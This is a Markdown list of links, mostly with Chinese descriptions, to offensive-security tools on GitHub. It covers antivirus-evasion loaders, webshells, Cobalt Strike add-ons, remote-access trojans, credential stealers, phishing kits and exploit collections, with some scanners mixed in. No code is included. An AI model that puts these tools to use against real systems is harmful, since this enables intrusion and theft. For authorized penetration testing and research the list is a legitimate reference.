- [【内网】RestrictedAdmin:远程启用受限管理员模式](https://github.com/GhostPack/RestrictedAdmin)
- [NewNtdllBypassInlineHook_CSharp:通过文件映射加载 ntdll.dll 的新副本以绕过 API 内联hook](https://github.com/Kara-4search/NewNtdllBypassInlineHook_CSharp)
- [spp:简单强大的多协议双向代理工具 A simple and powerful proxy](https://github.com/esrrhs/spp)
- [【免杀】AVByPass:一款Web在线自动免杀工具(利用 Python 反序列化免杀)](https://github.com/yhy0/AVByPass)
- [【免杀】ZheTian:免杀shellcode加载框架](https://github.com/yqcs/ZheTian)
- [LSTAR:CobaltStrike 综合后渗透插件](https://github.com/lintstar/LSTAR)
- [SharpSQLTools:有了 sqlserver 权限后,可用来上传下载文件,xp_cmdshell与sp_oacreate执行命令回显和clr加载程序集执行相应操作](https://github.com/uknowsec/SharpSQLTools)
- [spring-boot-webshell:但文件版 spring-boot webshell环境](https://github.com/durkworf/spring-boot-webshell)|[SpringBootWebshell:Springboot的一个webshell](https://github.com/fupinglee/SpringBootWebshell)
- [java-object-searcher:java内存对象搜索辅助工具](https://github.com/c0ny1/java-object-searcher)
- [GTFOBins:通过Linux 系统中错误的配置来提升权限](https://gtfobins.github.io/)
- [QueenSono: 使用 ICMP 协议进行数据渗透](https://github.com/ariary/QueenSono)
- [Pollenisator: 具有高度可定制工具的协作渗透测试工具](https://github.com/AlgoSecure/Pollenisator)
- [arsenal:常用黑客程序的命令补全快速启动工具](https://github.com/Orange-Cyberdefense/arsenal)
- [AllatoriCrack:破解 Java 混淆工具 Allatori](https://github.com/lqs1848/AllatoriCrack)
- [CuiRi:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马](https://github.com/NyDubh3/CuiRi)
- [Xjar_tips:Spring Boot JAR 安全加密运行工具, 同时支持的原生JAR](https://github.com/jas502n/Xjar_tips)
- [druid_sessions:提取 Druid 的 session 工具](https://github.com/yuyan-sec/druid_sessions)
- [xmap:快速网络扫描器, 专为执行互联网范围内的 IPv6 和IPv4 网络研究扫描而设计](https://github.com/idealeer/xmap)
- [WAF-bypass-xss-payloads:一直更新的 bypass waf 的 XSS payload 仓库](https://github.com/Walidhossain010/WAF-bypass-xss-payloads)
- [vshell:基于蚁剑控制台编写的rat,使用蚁剑远程控制主机](https://github.com/veo/vshell)
- [CVE-2021-21985:VMware vCenter Server远程代码执行漏洞](https://github.com/testanull/Project_CVE-2021-21985_PoC)|[可回显的POC](https://github.com/r0ckysec/CVE-2021-21985)
- [FuckAV:python写的一款免杀工具(shellcode加载器)BypassAV](https://github.com/iframepm/FuckAV)
- [【免杀】avcleaner:通过分析抽象语法树的方式进行字符串混淆并重写系统调用来隐藏API函数的使用,使其绕过杀软的静态文件扫描和动态的API函数行为检测](https://github.com/scrt/avcleaner)
- [cDogScan:又一款多服务口令爆破、内网常见服务未授权访问探测,端口扫描工具](https://github.com/fuzz7j/cDogScan)
- [henggeFish:自动化批量发送钓鱼邮件](https://github.com/SkewwG/henggeFish)
- [EXOCET-AV-Evasion:可绕过杀软的 Payload 投递工具](https://github.com/tanc7/EXOCET-AV-Evasion)
- [DNSlog-GO:DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面](https://github.com/lanyi1998/DNSlog-GO)
- [SCFProxy:一个利用腾讯云函数服务做 HTTP 代理、SOCKS5 代理、反弹 shell、C2 域名隐藏的工具](https://github.com/shimmeris/SCFProxy)
- [firezone:通过 web 界面来管理 wireguard ](https://github.com/firezone/firezone)
- [Atlas:帮助你快速筛选测试能够绕过 waf 的 sqlmap tamper](https://github.com/m4ll0k/Atlas)
- [cobaltstrike-bof-toolset:在cobaltstrike中使用的bof工具集,收集整理验证好用的bof](https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset)
- [domainNamePredictor:一个简单的现代化公司域名使用规律预测及生成工具](https://github.com/LandGrey/domainNamePredictor)
- [GoScan:采用Golang语言编写的一款分布式综合资产管理系统,适合红队、SRC等使用](https://github.com/CTF-MissFeng/GoScan)
- [Finger:一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具](https://github.com/EASY233/Finger)
- [ast-hook-for-js-RE:浏览器内存漫游解决方案(JS逆向)](https://github.com/CC11001100/ast-hook-for-js-RE)
- [SharpOXID-Find:OXID_Find by Csharp(多线程) 通过OXID解析器获取Windows远程主机上网卡地址](https://github.com/uknowsec/SharpOXID-Find)
- [yak gRPC Client GUI - 集成化单兵工具平台](https://github.com/yaklang/yakit)
- [reFlutter:辅助逆向Flutter生成的APP](https://github.com/ptswarm/reFlutter)
- [SillyRAT:跨平台、多功能远控](https://github.com/hash3liZer/SillyRAT)
- [HandleKatz: 使用 Lsass 的克隆句柄来创建相同的混淆内存转储](https://github.com/codewhitesec/HandleKatz)
- [HTTPUploadExfil: 用于渗透数据/文件的简易 HTTP 服务器](https://github.com/IngoKl/HTTPUploadExfil)
- [CSAgent:CobaltStrike 4.x通用白嫖及汉化加载器](https://github.com/Twi1ight/CSAgent)|[备份下载](./tools/CSAgent.zip)
- [nemo_go:用来进行自动化信息收集的一个简单平台,通过集成常用的信息收集工具和技术,实现对内网及互联网资产信息的自动收集,提高隐患排查和渗透测试的工作效率](https://github.com/hanc00l/nemo_go)
- [SpringBootExploit:根据Spring Boot Vulnerability Exploit Check List清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛](https://github.com/0x727/SpringBootExploit)|[备份下载](./tools/SpringBootExploit-1.1-SNAPSHOT-all.jar)
- [WiFiDuck:一款通过无线键盘来注入攻击的近源渗透攻击](https://github.com/SpacehuhnTech/WiFiDuck)
- [AggressorScripts_0x727:Cobalt Strike AggressorScripts For Red Team](https://github.com/0x727/AggressorScripts_0x727)
- [android_virtual_cam:xposed安卓虚拟摄像头-可绕过部分人脸检测](https://github.com/w2016561536/android_virtual_cam)
- [X-WebScan:Vulcan2.0|分布式扫描器|漏洞扫描|指纹识别](https://github.com/RedTeamWing/X-WebScan)
- [Taie-AutoPhishing:剑指钓鱼基建快速部署自动化](https://github.com/taielab/Taie-AutoPhishing)
- [rotateproxy:利用fofa搜索socks5开放代理进行代理池轮切的工具](https://github.com/akkuman/rotateproxy)
- [PassDecode-jar:帆软/致远密码解密工具](https://github.com/Rvn0xsy/PassDecode-jar)
- [pwcrack-framework:是一个用Ruby编写的密码自动破解框架,目前提供了 25 个在线破解和 25 个离线破解接口,支持 48 种算法破解](https://github.com/L-codes/pwcrack-framework)
- [通过编写 CS 的信标文件(BOF)来进行shellcode 注入、执行等操作](https://github.com/boku7/HOLLOW)
- [CS-Situational-Awareness-BOF:大量已经编译好的 CS 信标文件](https://github.com/trustedsec/CS-Situational-Awareness-BOF)
- [HostCollision:用于host碰撞而生的小工具,专门检测渗透中需要绑定hosts才能访问的主机或内部系统](https://github.com/pmiaowu/HostCollision)
- [Hosts_scan:用于IP和域名碰撞匹配访问的小工具,旨意用来匹配出渗透过程中需要绑定hosts才能访问的弱主机或内部系统](https://github.com/fofapro/Hosts_scan)
- [自动化Host碰撞工具,帮助红队快速扩展网络边界,获取更多目标点](https://github.com/cckuailong/hostscan)
- [JSPHorse:结合反射调用、Javac动态编译、ScriptEngine调用JS技术和各种代码混淆技巧的一款免杀JSP Webshell生成工具,已支持蚁剑免杀](https://github.com/EmYiQing/JSPHorse)
- [gitlab-version-nse:用于gitlab 版本探测以及漏洞信息检索的 Nmap 脚本](https://github.com/righel/gitlab-version-nse)
- [natpass:新一代NAT内网穿透+shell+vnc工具](https://github.com/lwch/natpass)
- [rs_shellcode:rust 语言编写的 shellcode 加载器](https://github.com/b1tg/rs_shellcode)
- [Web-Attack-Cheat-Sheet:web 攻击清单](https://github.com/riramar/Web-Attack-Cheat-Sheet)
- [awvs13_batch_py3:针对 AWVS扫描器开发的批量扫描脚本,支持联动xray、burp、w13scan等被动批量](https://github.com/test502git/awvs13_batch_py3)
- [Jira-Lens:一款专门扫描 jira 漏洞的工具](https://github.com/MayankPandey01/Jira-Lens)
- [Sec-Tools:一款基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能](https://github.com/jwt1399/Sec-Tools)
- [Fvuln:漏洞批量扫描集合工具(闭源)](https://github.com/d3ckx1/Fvuln)
- [MySQL_Fake_Server:用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包](https://github.com/fnmsd/MySQL_Fake_Server)
- [ysomap:一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用](https://github.com/wh1t3p1g/ysomap)
- [CobaltStrike_CNA:使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等(CVE-2020-0796+CVE-2020-0787)](https://github.com/yanghaoi/CobaltStrike_CNA)
- [webshell-bypassed-human:过人 webshell 的生成工具](https://github.com/Macr0phag3/webshell-bypassed-human)
- [BlueShell:一个Go语言编写的持续远控工具,拿下靶机后,根据操作系统版本下载部署对应的bsClient,其会每隔固定时间向指定的C&C地址发起反弹连接尝试,在C&C端运行bsServer即可连接bsClient,从而实现对靶机的持续控制](https://github.com/whitehatnote/BlueShell)
- [SimpleRemoter:基于gh0st的远程控制器:实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能](https://github.com/yuanyuanxiang/SimpleRemoter)
- [Caesar:全新的敏感文件发现工具](https://github.com/SafeGroceryStore/Caesar)
- [LinuxFlaw:Linux 平台的漏洞 PoC、Writeup 收集](https://github.com/mudongliang/LinuxFlaw)
- [fuso:扶桑一款RUST 编写的快速, 稳定, 高效, 轻量的内网穿透, 端口转发工具](https://github.com/editso/fuso)
- [SpringMemShell:Spring内存马检测和隐形马研究](https://github.com/EmYiQing/SpringMemShell)
- [SharpMemshell:.NET写的内存shell](https://github.com/A-D-Team/SharpMemshell)
- [jsForward:解决web及移动端H5数据加密Burp调试问题](https://github.com/CTF-MissFeng/jsForward)|[JS-Forward:原版](https://github.com/G-Security-Team/JS-Forward)
- [Command2API:将执行命令的结果返回到Web API上](https://github.com/gh0stkey/Command2API)
- [ProxyAgent:在有 root 权限的手机上安装代理以方便使用 burpsuite 代理流量](https://github.com/GovTech-CSG/ProxyAgent)
- [reapoc:开源POC的收集和漏洞验证环境](https://github.com/cckuailong/reapoc)
- [yaml-payload-for-ruoyi:若依 snakeyaml 反序列化漏洞注入内存马](https://github.com/lz2y/yaml-payload-for-ruoyi)|[yaml-payload:可生成命令执行的 jar 包](https://github.com/artsploit/yaml-payload)
- [goHashDumper:用于Dump指定进程的内存,主要利用静默退出机制(SilentProcessExit)和Windows API(MiniDumpW)实现](https://github.com/crisprss/goHashDumper)
- [wxappUnpacker:小程序反编译(支持分包)](https://github.com/xuedingmiaojun/wxappUnpacker)
- [MyFuzzAll:fuzz、爆破字典](https://github.com/yyhuni/MyFuzzAll)
- [NPPSpy:获取Windows明文密码的小工具](https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy)|[CMPSpy:改进版本](https://github.com/fengwenhua/CMPSpy)
- [PoC-in-GitHub:收录 github 上公开的 POC 按照年份排列](https://github.com/nomi-sec/PoC-in-GitHub)
- [icp-domains:输入一个域名,输出ICP备案所有关联域名](https://github.com/1in9e/icp-domains)
- [netspy:一款快速探测内网可达网段工具](https://github.com/shmilylty/netspy)
- [rathole:一个用 rust 编写,功能类似 FRP 和 NGROK的内网代理穿透工具](https://github.com/rapiz1/rathole)
- [CodeAnalysis:腾讯开源的静态代码扫描器](https://github.com/Tencent/CodeAnalysis)
- [GetOut360:管理员权限下强制关闭360](https://github.com/Yihsiwei/GetOut360)
- [goby_poc:分享goby最新网络安全漏洞检测或利用代码](https://github.com/aetkrad/goby_poc)
- [Fiora:漏洞PoC框架的图形版,快捷搜索PoC、一键运行Nuclei](https://github.com/bit4woo/Fiora)
- [BypassUserAdd:通过反射DLL注入、Win API、C#、以及底层实现NetUserAdd方式实现BypassAV进行增加用户的功能,实现Cobalt Strike插件化](https://github.com/crisprss/BypassUserAdd)
- [WebBatchRequest:使用 JAVA 编写的批量请求工具,可做获取 title 或者web存活检测](https://github.com/ScriptKid-Beta/WebBatchRequest)
- [ICP-Checker:备案查询,可查询企业或域名的ICP备案信息](https://github.com/wongzeon/ICP-Checker)
- [SMBeagle:一款功能强大的SMB文件共享安全审计工具](https://github.com/punk-security/SMBeagle)
- [wJa:java闭源项目的自动化白盒+黑盒测试工具](https://github.com/Wker666/wJa)
- [Poc-Exp:有关OA、中间件、框架、路由器等应用的漏洞搜集](https://github.com/pen4uin/Poc-Exp)
- [GoTokenTheft:用 golang 写的进程token 窃取工具](https://github.com/Aquilao/GoTokenTheft)
- [pwncat:功能强大的反向Shell&BindShell处理工具](https://github.com/calebstewart/pwncat)
- [ReverseRDP_RCE:反向 RCE 连接 RDP 的客户端](https://github.com/klinix5/ReverseRDP_RCE)
- [Urldns:通过 Urldns 链来探测是否存在某个类,以便针对性的使用攻击链](https://github.com/kezibei/Urldns)
- [COFFLoader2:Load and execute COFF files and Cobalt Strike BOFs in-memory](https://github.com/Yaxser/COFFLoader2)
- [Cobalt-Clip:Cobaltstrike addons to interact with clipboard](https://github.com/DallasFR/Cobalt-Clip)
- [Invoke-Bof:Load any Beacon Object File using Powershell](https://github.com/airbus-cert/Invoke-Bof)
- [InlineWhispers2:Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2](https://github.com/Sh0ckFR/InlineWhispers2)
- [Geacon:Using Go to implement CobaltStrike's Beacon](https://github.com/DongHuangT1/Geacon)
- [DLL-Hijack-Search-Order-BOF:DLL Hijack Search Order Enumeration BOF](https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF)
- [PortBender:TCP Port Redirection Utility](https://github.com/praetorian-inc/PortBender)
- [winrmdll:C++ WinRM API via Reflective DLL](https://github.com/mez-0/winrmdll)
- [Readfile_BoF:read file contents to beacon output](https://github.com/trainr3kt/Readfile_BoF)
- [BokuLoader:Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities](https://github.com/boku7/BokuLoader)
- [HOLLOW:EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode](https://github.com/boku7/HOLLOW)
- [MemReader_BoF:search and extract specific strings from a target process memory and return what is found to the beacon output](https://github.com/trainr3kt/MemReader_BoF)
- [secinject:Section Mapping Process Injection (secinject): Cobalt Strike BOF](https://github.com/apokryptein/secinject)
- [BOF-Builder:C# .Net 5.0 project to build BOF (Beacon Object Files) in mass](https://github.com/ceramicskate0/BOF-Builder)
- [ServiceMove-BOF:New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution](https://github.com/netero1010/ServiceMove-BOF)
- [TrustedPath-UACBypass-BOF:Beacon object file implementation for trusted path UAC bypass](https://github.com/netero1010/TrustedPath-UACBypass-BOF)
- [Quser-BOF:Cobalt Strike BOF for quser.exe implementation using Windows API](https://github.com/netero1010/Quser-BOF)
- [SharpGhosting:C#写的创建幽灵进程的工具](https://github.com/Wra7h/SharpGhosting)
- [Pentesting-Active-Directory-CN:域渗透脑图中文翻译版](https://github.com/NyDubh3/Pentesting-Active-Directory-CN)|[英文原版](https://github.com/Orange-Cyberdefense/arsenal/)
- [fuzzware:针对固件的自动化、自配置的 Fuzzing 工具](https://github.com/fuzzware-fuzzer/fuzzware)
- [python-codext:Python 编码/解码库, 扩展了原生的 codecs 库, 提供 120 多个新编解码器](https://github.com/dhondta/python-codext)
- [chrome-bandit:在 Mac 上通过 chrome 自动填充获取保存的密码](https://github.com/masasron/chrome-bandit)
- [GoBypass:Golang免杀生成工具](https://github.com/EmYiQing/GoBypass)
- [sliver:一个通用的跨平台的支持多种连接形式的远控框架](https://github.com/BishopFox/sliver)
- [ripgen:根据子域名生成新的相关子域名](https://github.com/resyncgg/ripgen)
- [GUI_Tools:一个由各种图形化渗透工具组成的工具集](https://github.com/ghealer/GUI_Tools)
- [MDUT:一款中文的数据库跨平台利用工具,基于前人 SQLTOOLS 的基础开发了这套程序](https://github.com/SafeGroceryStore/MDUT)
- [GoWard:A robust Red Team proxy written in Go](https://github.com/chdav/GoWard)
- [DynWin32-ReverseShell.ps1:通过 PowerShell 来获得反弹shell](https://gist.github.com/qtc-de/a87b2c97fd9e0330ad2dc67789a62ba5)
- [pentest-book:渗透测试有关的脚本、信息和知识总结](https://github.com/six2dez/pentest-book)
- [My-Shodan-Scripts:shodan搜索脚本集合](https://github.com/random-robbie/My-Shodan-Scripts)
- [rebeyond-Mode:修改版冰蝎](https://github.com/angels520/rebeyond-Mode)
- [vulnerability-lab:OA/中间件/框架/路由器相关漏洞](https://github.com/pen4uin/vulnerability-lab)
- [Exploits_and_Advisories:由项目作者自己跟踪或者是发现的一些公开的漏洞和利用](https://github.com/rdomanski/Exploits_and_Advisories)
- [dll-merger:将dll和32位的exe文件进行合并,区别于传统的LoadLibrary方式,通过在exe的pe结构中添加.dlls和.ldr段,实现自动加载dll](https://github.com/ytk2128/dll-merger)
- [hvcs:资产信息整理与脆弱性检测工具(类似与 kscan)](https://github.com/yqcs/hvcs)
- [garble:Obfuscate Go builds(go 编译混淆)](https://github.com/burrowers/garble)
- [ihoneyBakFileScan_Modify:批量网站备份文件泄露扫描工具](https://github.com/VMsec/ihoneyBakFileScan_Modify)
- [Sylas:数据库综合利用工具](https://github.com/Ryze-T/Sylas)
- [Space_view:一款Hunter(鹰图平台)或者FOFA平台 资产展示的浏览器油猴插件](https://github.com/0x727/Space_view)
- [goShellCodeByPassVT:通过线程注入及-race参数免杀全部VT](https://github.com/ort4u/goShellCodeByPassVT)
- [DongTai:火线-洞态IAST,一款开源的被动式交互式安全测试(IAST)产品](https://github.com/HXSecurity/DongTai)
- [transfer:集合多个API的大文件传输工具(go 编写跨平台,适合渗透测试传输文件上传出网)](https://github.com/Mikubill/transfer)
- [SharpXDecrypt:Xshell全版本密码恢复工具(截至目前最新7.1版本)](https://github.com/JDArmy/SharpXDecrypt)
- [pocV:一个兼容xray V2 poc和nuclei的poc扫描框架](https://github.com/WAY29/pocV)
- [ClassHound:利用任意文件下载漏洞循环下载反编译 Class 文件获得网站 Java 源代码](https://github.com/LandGrey/ClassHound)
- [blueming:备份文件扫描,并自动进行下载](https://github.com/bufsnake/blueming)
- [CamOver:摄像头漏洞利用工具](https://github.com/EntySec/CamOver)
- [JDumpSpider:HeapDump敏感信息提取工具](https://github.com/whwlsfb/JDumpSpider)
- [sgn-html:MSF 的Shikata Ga Nai编码器web 端使用](https://github.com/akkuman/sgn-html)|[相关文章:将Shikata ga nai带到前端](https://mp.weixin.qq.com/s/KtX8hMg1V0R752U60jkfVQ)
- [net2nimv2:nim快速免杀.net exe程序](https://github.com/yougar0/net2nimv2)
- [InjectJDBC:注入JVM进程 动态获取目标进程连接的数据库](https://github.com/BeichenDream/InjectJDBC)
- [LinuxEelvation:Linux 提权漏洞集合](https://github.com/Al1ex/LinuxEelvation)
- [CDK:一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP](https://github.com/cdk-team/CDK)
- [PentestDB:各种数据库的利用姿势](https://github.com/safe6Sec/PentestDB)
- [gadgetinspector:一个利用ASM对字节码进行污点传播分析的静态代码审计应用(添加了大量代码注释,适合大家进行源码学习)。也加入了挖掘Fastjson反序列化gadget chains和SQLInject(JdbcTemplate、MyBatis、JPA、Hibernate、原生jdbc等)静态检测功能。并且加入了很多功能以方便进行漏洞自动化挖掘](https://github.com/threedr3am/gadgetinspector)
- [Safe-development:全国dns解析识别cdn,图形化ip反查域名,自动化输入验证码](https://github.com/gubeihc/Safe-development)
- [ast_tools:ast基础框架-基于babel](https://github.com/sml2h3/ast_tools)
- [AM:bypass amsi resurrection whit code payload link](https://github.com/3xploit666/AM)
- [QingScan:一个批量漏洞挖掘工具,黏合各种好用的扫描器](https://github.com/78778443/QingScan)
- [exploitalert:漏洞搜索网站](https://www.exploitalert.com/)
- [zscan:Zscan是一个开源的内网端口扫描器、爆破工具和其他实用工具的集合体可以称为工具包](https://github.com/zyylhn/zscan)
- [redis-rce:redis主从复制rce的go版本,可独立编译使用【支持执行命令+上传文件】](https://github.com/zyylhn/redis_rce)
- [Fastjson-Gadgets-Automatic-Scanner:Python 编写的扫码 jar 包里的 fastjson 利用链](https://github.com/H3rmesk1t/Fastjson-Gadgets-Automatic-Scanner)
- [AgentInjectTool:改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能](https://github.com/SummerSec/AgentInjectTool)
- [ByPassBehinder4J:冰蝎Java WebShell免杀生成](https://github.com/Tas9er/ByPassBehinder4J)
- [ecapture:通过 hook ebpf 技术,无需CA证书,进行HTTPS的明文通讯抓包、bash 命令捕获和 MySQL query 等数据库审计](https://github.com/ehids/ecapture)
- [udpme:从协议层面借助 EDNS0 过滤掉有问题的 UDP 报文](https://github.com/IrineSistiana/udpme)
- [FirmWire:支持三星和联发科的全系统基带固件分析平台](https://github.com/FirmWire/FirmWire)
- [apache-afl:使用 AFL++ 对 Apache httpd 进行 Fuzz 的自动化配置](https://github.com/0xbigshaq/apache-afl)
- [container-escape-check:容器逃逸检测脚本](https://github.com/teamssix/container-escape-check)
- [EvilSelenium:将Selenium 武器化以攻击 Chrome 的工具](https://github.com/mrd0x/EvilSelenium)
- [PHPGGC:PHP 反序列化工具](https://github.com/ambionics/phpggc)
- [GBByPass:冰蝎 哥斯拉 WebShell bypass](https://github.com/czz1233/GBByPass)
- [AtlasC2:C#写的C2远控工具](https://github.com/Gr1mmie/AtlasC2)
- [【免杀】GoBypass:Golang免杀生成工具](https://github.com/Sec-Fork/GoBypass)
- [GolangBypassAV:研究利用golang各种姿势bypassAV](https://github.com/safe6Sec/GolangBypassAV)
- [YouMayPasser](https://github.com/waldo-irc/YouMayPasser)
- [Java-Shellcode-Loader:基于Java实现的Shellcode加载器](https://github.com/yzddmr6/Java-Shellcode-Loader)
- [xss-payload-list:XSS payload](https://github.com/payloadbox/xss-payload-list)
- [owa_info:获取Exchange信息的小工具](https://github.com/Ridter/owa_info)
- [cdb-wds:利用白名单文件 cdb.exe 执行 shellcode](https://github.com/Ryze-T/cdb-wds)
- [cdn-proxy:克隆目标网站并禁用CDN+WAF](https://github.com/RyanJarv/cdn-proxy)
- [Cronos-Rootkit:适用于 Windows10和11的进程保护、隐藏和权限提升工具](https://github.com/XaFF-XaFF/Cronos-Rootkit)
- [RPCSCAN:RPC未授权远程主机信息获取工具](https://github.com/JDArmy/RPCSCAN)
- [CandyPotato:烂土豆提权,增加自动化利用](https://github.com/klezVirus/CandyPotato)
- [PasswordDecrypts:密码解密相关,目前支持 VNC 解密](https://github.com/frizb/PasswordDecrypts)
- [tetanus:用 rust 开发的一款针对 Windows 和Linux 的 C2 工具](https://github.com/MythicAgents/tetanus)
- [mortar:可有效规避安全产品的检测 shellcode 加载器](https://github.com/0xsp-SRD/mortar)
- [go-mitmproxy:用 Golang 实现的中间人攻击,解析、监测、篡改 HTTP/HTTPS 流量](https://github.com/lqqyt2423/go-mitmproxy)
- [dll_inject_vs_binaries:将 dll 注入指定进程](https://github.com/mrd0x/dll_inject_vs_binaries)
- [go4Hacker:golang 编写支持 DNSLOG、HTTPLOG、Rebinding和多用户的工具,支持 docker 一键部署](https://github.com/hktalent/go4Hacker)
- [GetMail:利用NTLM Hash读取Exchange邮件](https://github.com/b0bac/GetMail)
- [xss2png:把 XSS 写入PNG 图片IDAT区域](https://github.com/vavkamil/xss2png)
- [Hello-Java-Sec:Java漏洞平台,结合漏洞代码和安全编码](https://github.com/j3ers3/Hello-Java-Sec)
- [PSSW100AVB:bypass AV 的 PowerShell 脚本](https://github.com/tihanyin/PSSW100AVB)
- [JavaShellcodeInjector:JAVA shellcode 注入工具](https://github.com/xxDark/JavaShellcodeInjector)
- [Java-Shellcode-Loader:基于Java实现的Shellcode加载器](https://github.com/yzddmr6/Java-Shellcode-Loader)
- [shellcode-factory:shellcode 生成框架](https://github.com/lainswork/shellcode-factory)
- [BcryptCrack_Jenkins:针对于Jenkins控制台用户的暴力破解工具](https://github.com/rabbitmask/BcryptCrack_Jenkins)
- [SB-Actuator:Spring Boot Actuator未授权访问【XXE、RCE】单/多目标检测](https://github.com/rabbitmask/SB-Actuator)
- [csOnvps:CobaltStrike4.4 一键部署脚本](https://github.com/AlphabugX/csOnvps)
- [GoFileBinder:golang免杀捆绑器](https://github.com/Yihsiwei/GoFileBinder)
- [byeintegrity2-uac:利用 Windows IE 浏览器加载安装程序 bypass UAC](https://github.com/AzAgarampur/byeintegrity2-uac)
- [LeakedHandlesFinder:查找泄露的 Windows 进程句柄](https://github.com/lab52io/LeakedHandlesFinder)
- [nim-loader:nim 编写的 shellcode 加载器](https://github.com/adamsvoboda/nim-loader)
- [session_enum:通过NetSessionEnum获取域内机器对应用户](https://github.com/n0thing0x01/session_enum)
- [httpfinger:Http指纹管理工具](https://github.com/lcvvvv/httpfinger)
- [dwm-screen-shot:将shellcode注入dwm.exe以进行屏幕截取](https://github.com/lainswork/dwm-screen-shot)
- [XY-AASTools-1.7:一款交互的免杀工具](https://github.com/liusuxyds-only/XY-AASTools-1.7)
- [CDNCheck:CDN 检测](https://github.com/wwl012345/CDNCheck)
- [ipcdn:检查 IP 列表属于哪些 CDN 提供商](https://github.com/six2dez/ipcdn)
- [CloudFail:利用配置错误的 DNS 和旧数据库记录来查找 CloudFlare 网络背后的隐藏 IP](https://github.com/m0rtem/CloudFail)
- [DLLirant:对指定二进制文件进行自动 dll 劫持检测](https://github.com/Sh0ckFR/DLLirant)
- [DLLHijackTest:通过 powershell 脚本查找 dll 劫持](https://github.com/slyd0g/DLLHijackTest)
- [ImpulsiveDLLHijack:用 c#编写的工具来查找 dll劫持](https://github.com/knight0x07/ImpulsiveDLLHijack)
- [golang-RCE-0day-POC](https://github.com/hktalent/golang-RCE-0day-POC)
- [Atlassian(Jira、Confluence、Bitbucket)产品和 Jenkins、Solr、Nexus 的 PoC 集合](https://github.com/shadowsock5/Poc)
- [SharPyShell:适用于 c# web 应用的经过asp.net混淆的webshell](https://github.com/antonioCoco/SharPyShell)
- [RunPE:使用 c#反射加载二进制文件](https://github.com/nettitude/RunPE)
- [0day:各种CMS、各种平台、各种系统、各种软件漏洞的EXP、POC 该项目将不断更新](https://github.com/helloexp/0day)
- [poc-collection:对 github 上公开的 PoC 进行收集的一个项目](https://github.com/TeraSecTeam/poc-collection)
- [sec-note:记录安全方面的笔记/工具/漏洞合集](https://github.com/reidmu/sec-note)
- [POChouse:POC&EXP仓库、hvv弹药库、Nday、1day](https://github.com/DawnFlame/POChouse)
- [eyes.sh:基于bugscan dnslog 优化版](https://github.com/lijiejie/eyes.sh)
- [CVE-2022-22965-POC:CVE-2022-22965 spring-core批量检测脚本](https://github.com/chaosec2021/CVE-2022-22965-POC)|[漏洞环境:tomcat 的 war 包](https://github.com/fengguangbin/spring-rce-war)|[漏洞环境:docker 版](https://github.com/lunasec-io/Spring4Shell-POC)|[支持注入冰蝎内存马和解决持续追加问题](https://github.com/liangyueliangyue/spring-core-rce)
- [ConPtyShell:适用于 Windows 的反弹互式 shell工具](https://github.com/antonioCoco/ConPtyShell)
- [RemotePotato0:Windows 提权工具,从普通用户提前至域管理员](https://github.com/antonioCoco/RemotePotato0)
- [jfscan:masscan和 nmap 联合的端口扫描脚本](https://github.com/nullt3r/jfscan)
- [NativePayload_CBT:通过回调函数加载代码执行](https://github.com/DamonMohammadbagher/NativePayload_CBT)
- [RPCDump:通过RP来 dump 信息](https://github.com/csandker/RPCDump)
- [gadgetinspector:利用链、漏洞检测工具](https://github.com/5wimming/gadgetinspector)
- [LinuxMirrors:GNU/Linux 一键更换国内软件源](https://github.com/SuperManito/LinuxMirrors)
- [AnonymousSMBServer:一个红队脚本,可以快速对指定文件夹开启和关闭匿名SMB共享,适合搭配 PrintNightmare 漏洞使用](https://github.com/NyDubh3/AnonymousSMBServer)
- [CMSCheck:可以对多个网站进行批量CMS识别,寻找网站指纹,进行漏洞利用](https://github.com/wwl012345/CMSCheck)
- [cobaltstrike-beacon-data:Open Dataset of Cobalt Strike Beacon metadata (2018-2022)](https://github.com/fox-it/cobaltstrike-beacon-data)
- [Banli:一款简单好用的高危资产和高危漏洞扫描工具](https://github.com/Goqi/Banli)
- [spring4shell-scan:Spring4Shell and Spring Cloud RCE 漏洞检测脚本](https://github.com/fullhunt/spring4shell-scan)
- [SqlKnife_0x727:适合在命令行中使用的轻巧的SQL Server数据库安全检测工具](https://github.com/0x727/SqlKnife_0x727)
- [decodeObfuscator:免安装一键还原Obfuscator混淆过的代码](https://github.com/Tsaiboss/decodeObfuscator)
- [v_jstools:模仿着写一个开源的 chrome 插件,用来快速调试前端 js 代码](https://github.com/cilame/v_jstools)
- [Java_agent_without_file:Java agent without file 无文件的Java agent](https://github.com/xiaopan233/Java_agent_without_file)
- [mullet:梭鱼扫描器,Python 编写支持主动扫描和被动扫描](https://github.com/Ciyfly/mullet)
- [SpringInspector:Java自动代码审计工具](https://github.com/4ra1n/SpringInspector)
- [PrintSpoofer:PrintSpoofer的反射dll实现,结合Cobalt Strike使用](https://github.com/crisprss/PrintSpoofer)
- [ntlmquic:POC tools for exploring SMB over QUIC protocol](https://github.com/xpn/ntlmquic)
- [SharpDecryptPwd:解密工具,支持Navicat、Xmanager、TeamViewer、FileZilla、Foxmail、TortoiseSVN、WinSCP、Chrome、RDCMan、SunLogin](https://github.com/RowTeam/SharpDecryptPwd)
- [CcRemote:一个基于gh0st远程控制的项目](https://github.com/Cc28256/CcRemote)
- [H:一款强大的资产收集管理平台](https://github.com/SiJiDo/H)
